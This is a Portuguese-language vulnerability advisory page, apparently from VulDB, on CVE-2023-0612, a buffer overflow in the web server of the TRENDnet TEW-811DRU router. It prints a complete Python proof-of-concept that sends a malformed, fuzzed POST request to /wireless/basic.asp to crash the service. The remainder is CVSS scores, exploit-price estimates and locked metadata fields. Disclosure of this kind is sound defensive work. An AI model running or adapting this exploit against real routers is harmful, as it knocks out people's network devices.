| CVSS Meta Temp score | Preço de exploração actual (≈) | Nota de Interesse CTI |
|---|---|---|
| 7.3 | $0-$5k | 0.12 |
Uma vulnerabilidade, que foi classificada como crítico, foi encontrada em TRENDnet TEW-811DRU 1.0.10.0. Afectado é uma função desconhecida do ficheiro /wireless/basic.asp do componente httpd. A manipulação com uma entrada desconhecida leva a Excesso de tampão. Usar a CWE para declarar o problema leva à CWE-120.
A vulnerabilidade é identificada como CVE-2023-0612. O ataque pode ser iniciado a partir da rede. Os detalhes técnicos estão disponíveis. A vulnerabilidade não é bem conhecida. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada.
É declarado como proof-of-concept. A exploração é partilhada para download em vuldb.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k. O código utilizado pela exploração é:
import requests,socket import re import time from urllib.parse import urlencodedevice_web_ip = '192.168.10.1'
request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 'Content-Length': '2365', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'page': '/wireless/basic.asp', b'\xff\x99\xc3\x8a\x02\xff\x7f\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', b'wl_inpt': b'1', 'wl_bssid': 2, 'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', b'wl_\xef\x00\x14\x00\x01': 0, 'wl_ssid': 'dummy', b'l\x80cl\xff\xff\xff': 0, 'wl_chanspec': 40, b'wl_\x90l_\x90': 4, 'wl_wds0': '00:0c:29:d9:40:fe', b'll\x10': '00:0c:29:d9:40:ff', 'wl_wds2': '00:0c:29:d1:40:fe', b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', b'\x81\x80wwwwwww|wwwwwwwww': 0, b'wl\xff\xff\xff\x04\x00timeout': 1, b'\x00\x10\x7f\x89FF': 0, 'wl_country_code': b'\x00\x80', 'wl_country_rev': 27, 'wl_radio': b'\x1e', 'wl_nband': 1, 'wl_txchain': 3, 'wl_rxchain': b'3', 'wl_nmode_protection': 'auto', 'wl_vlan_prio_mode': b'Rl\x80\x80', 'wl_rate': 0, 'wl_rateset': b'h', 'wl_mrate': 0, 'wl_bcmdcs': 'off', 'wl_antdiv': -1, 'wl_reg_mode': 'off', 'wl_tpc_db': b'00', 'wl_obss_coex': b'1', 'wl_frag': 2346, 'wl_rts': b'3@', 'wl_dtim': b'\x7f', b'\x85\xff\x10\x05\xff': 100, 'wl_bcn_rotate': b'1', 'wl_maxassoc': 128, 'wl_frameburst': b'j\', 'wl_ampdu': b'V\x82', 'wl_rifs': b'~\x9boo', 'wl_rifs_advert': b'au\x7fo', 'wl_stbc_tx': b'\x03', 'wl_wme': b'nn', 'wl_wme_no_ack': b'\x10\x00\x9a', b'_w\xff\xff': 'on', 'wme_ap': b'(\x9e\x80', 'wl_wme_ap_be': 5, 'wl_wme_ap_be0': b'\x861', 'wl_wme_ap_be1': 63, 'wl_wme_ap_be2': 3, 'wl_wme_ap_be3': 0, 'wl_wme_ap_be4': 0, b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 'wl_wme_ap_be6': b'\x9a', 'wl_wme_ap_bk': 5, 'wl_wme_ap_bk0': b'\xc3\xbc', b'wl_wm{_apZbk1': 1023, 'wl_wme_ap_bk2': 7, 'wl_wme_ap_bk3': b'008', 'wl_wme_ap_bk4': 0, 'wl_wme_ap_bk5': b'ofo', 'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 'wl_wme_ap_vi': 5, 'wl_wme_ap_vi0': 7, 'wl_wme_ap_vi1': b'1G\xc3G', b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 'wl_wme_ap_vi3': 6016, 'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 'wl_wme_ap_vi5': b'\xff\xff\x17', 'wl_wme_ap_vi6': 'off', b'wl[wmeIap_vo': 5, 'wl_wme_ap_vo0': 3, 'wl_wme_ap_vo1': b'\xc3\xae\xf5', 'wl_wme_ap_vo2': 1, 'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 'wl_wme_ap_vo4': b'P', b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 'wl_wme_ap_vo6': b'oLd', b'ws]\xc2\x90\xc2\x90Ke': b'x', 'wl_wme_sta_be': 5, 'wl_wme_sta_be0': 15, b'\xf1\x00\xff\x0f': 1023, 'wl_wme_sta_be2': 3, b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', b't\x81\x803t\x81a3': 0, 'wl_wme_sta_be5': b'oof', 'wl_wme_sta_be6': b'boff', 'wl_wme_sta_bk': 5, 'wl_wme_sta_bk0': 15, 'wl_wme_sta_bk1': 1023, 'wl_wme_sta_bk2': 7, b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 'wl_wme_sta_bk4': 0, 'wl_wme_sta_bk5': b'd', 'wl_wme_sta_bk6': 'off', 'wl_wme_sta_vi': 5, b'wlTwulTwuekQ\x84': 7, 'wl_wme_sta_vi1': 15, 'wl_wme_sta_vi2': 2, 'wl_wme_sta_vi3': 6016, 'wl_wme_sta_vi4': 3008, 'wl_wme_sta_vi5': 'off', 'wl_wme_sta_vi6': 'off', 'wl_wme_sta_vo': 5, b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 'wl_wme_sta_vo1': 7, b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 'wl_wme_sta_vo5': b'Qff', 'wl_wme_sta_vo6': 'off', 'wme_txp': 8, 'wl_wme_txp_be0': 7, b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 'wl_wme_txp_be2': 4, 'wl_wme_txp_be3': 2, 'wl_wme_txp_be4': 0, 'wl_wme_txp_bk': 5, 'wl_wme_txp_bk0': b'O', b'wmwme_txp\x85k1': 3, 'wl_wme_txp_bk2': 4, 'wl_wme_txp_bk3': 2, 'wl_wme_txp_bk4': 0, 'wl_wme_txp_vi': 5, 'wl_wme_txp_vi0': 7, 'wl_wme_txp_vi1': 3, 'wl_wme_txp_vi2': 4, 'wl_wme_txp_vi3': 2, 'wl_wme_txp_vi4': 0, 'wl_wme_txp_vo': 5, b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, b't\x01': b'M', b'l_wme_me_txp_txp__tx': 4, 'wl_wme_txp_vo3': b':', 'wl_wme_txp_vo4': 0, 'wl_mode': 'ap', 'wl_ure': 0, 'wl_bridge': 0, 'wl_vlan_prio_mode__117_66oo': b'ome', b'/wipeless/basic.asp': b'', b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 'wan_summary_2_pppoe_username': '', 'mainform_submit': '', b'/tapppp.cgi': '', 'openheader': b'' }, 'ATTR': {'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }
headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']
try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) except Exception as e: print('error:{}'.format(e))
Produto
Fabricante
Nome
Versão
Licença
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍
CVSSv3
VulDB Meta Pontuação Base: 7.5VulDB Meta Temp score: 7.3
VulDB Pontuação Base: 7.5
VulDB Pontuação da Tempestade: 6.8
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍
NVD Pontuação Base: 7.5
NVD Vector: 🔍
CNA Pontuação Base: 7.5
CNA Vector (VulDB): 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexidade | Autenticação | Confidencialidade | Integridade | Disponibilidade |
|---|---|---|---|---|---|
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
VulDB Pontuação Base: 🔍
VulDB Pontuação da Tempestade: 🔍
VulDB Fiabilidade: 🔍
NVD Pontuação Base: 🔍
Exploração
Classe: Excesso de tampãoCWE: CWE-120 / CWE-119
ATT&CK: Desconhecido
Local: Não
Remoto: Sim
Disponibilidade: 🔍
Aceda a: Público
Estado: Proof-of-Concept
Linguagem de programação: 🔍
Descarregar: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Tendência dos preços: 🔍
Estimativa de preço actual: 🔍
| 0-Day | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
|---|---|---|---|---|
| Hoje | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Inteligência de Ameaças
Interesse: 🔍Actores Activos: 🔍
Grupos APT activos: 🔍
Contra-medidas
Recomendação: nenhuma medida conhecidaEstado: 🔍
Tempo 0-Dia: 🔍
Linha do tempo
01/02/2023 🔍01/02/2023 🔍
01/02/2023 🔍
01/03/2023 🔍
Fontes
Estado: Não definidoCVE: CVE-2023-0612 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
Entrada
Criado em: 01/02/2023 14h36Actualizado em: 01/03/2023 11h23
Ajustamentos: 01/02/2023 14h36 (42), 01/02/2023 17h52 (1), 01/03/2023 11h16 (2), 01/03/2023 11h23 (27)
Completo: 🔍
Submeter: leetsun
Submit
Aceite
- Submit #76180: Web crash of TRENDnet router TEW-811DRU (a partir de leetsun)
Ainda sem comentários. Idiomas: pt + en.
Por favor inicie sessão para comentar.